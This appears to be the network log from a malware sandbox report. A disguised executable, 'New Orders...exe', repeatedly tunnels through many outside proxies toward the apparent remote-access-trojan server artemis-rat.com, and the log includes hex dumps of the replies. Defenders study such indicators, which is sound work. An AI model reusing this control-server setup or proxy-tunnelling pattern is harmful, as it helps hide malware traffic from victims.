                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        994192.168.2.952716102.212.86.5780807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.575591087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        995192.168.2.952931130.162.213.17531297672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.577963114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.019402027 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        996192.168.2.952901106.14.255.124807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.578320026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        997192.168.2.95300265.49.82.7581957672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.586220026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        998192.168.2.953037172.67.69.9807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.590208054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.744389057 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        999192.168.2.952877170.84.205.1741537672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.593794107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1000192.168.2.952032152.32.130.117180807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.595115900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1001192.168.2.953068104.25.64.27807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.597733974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.752494097 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1002192.168.2.95297213.38.176.10431287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.600085020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.895776987 CET116INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Server: nginx
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1003192.168.2.951919161.97.163.5217987672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.601808071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.664015055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.773766994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.773622036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:07.867239952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:31.960625887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:20.070147038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1004192.168.2.95284489.218.8.15210807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.614022970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1005192.168.2.9528883.108.115.4810807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.614329100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.005153894 CET116INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Server: nginx
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1006192.168.2.950512171.235.166.22240197672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.614880085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.136962891 CET228INHTTP/1.0 502 Bad Gateway
                                                                                        Connection: close
                                                                                        Content-type: text/html; charset=utf-8
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 32 3e 3c 68 33 3e 48 6f 73 74 20 4e 6f 74 20 46 6f 75 6e 64 20 6f 72 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 66 61 69 6c 65 64 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><h2>502 Bad Gateway</h2><h3>Host Not Found or connection failed</h3></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1007192.168.2.952027213.136.79.177353587672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.630240917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.664016008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.773772001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.773622036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:07.867357016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:19.962167978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:31.960660934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:55.963718891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:43.976291895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1008192.168.2.952977211.222.252.187807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.630728006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1009192.168.2.953095104.16.105.182807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.633141994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.787677050 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1010192.168.2.952939185.101.16.52807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.633322954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1011192.168.2.95297547.242.15.120156737672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.634553909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1012192.168.2.953125162.159.242.104807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.635121107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.795919895 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1013192.168.2.953044198.199.86.1131287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.635126114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.102730989 CET28INHTTP/1.1 400 Bad Request


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1014192.168.2.953109104.20.75.31807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.635709047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.790067911 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1015192.168.2.952911123.126.158.50807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.635720015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1016192.168.2.950433203.205.34.5856787672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.636270046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
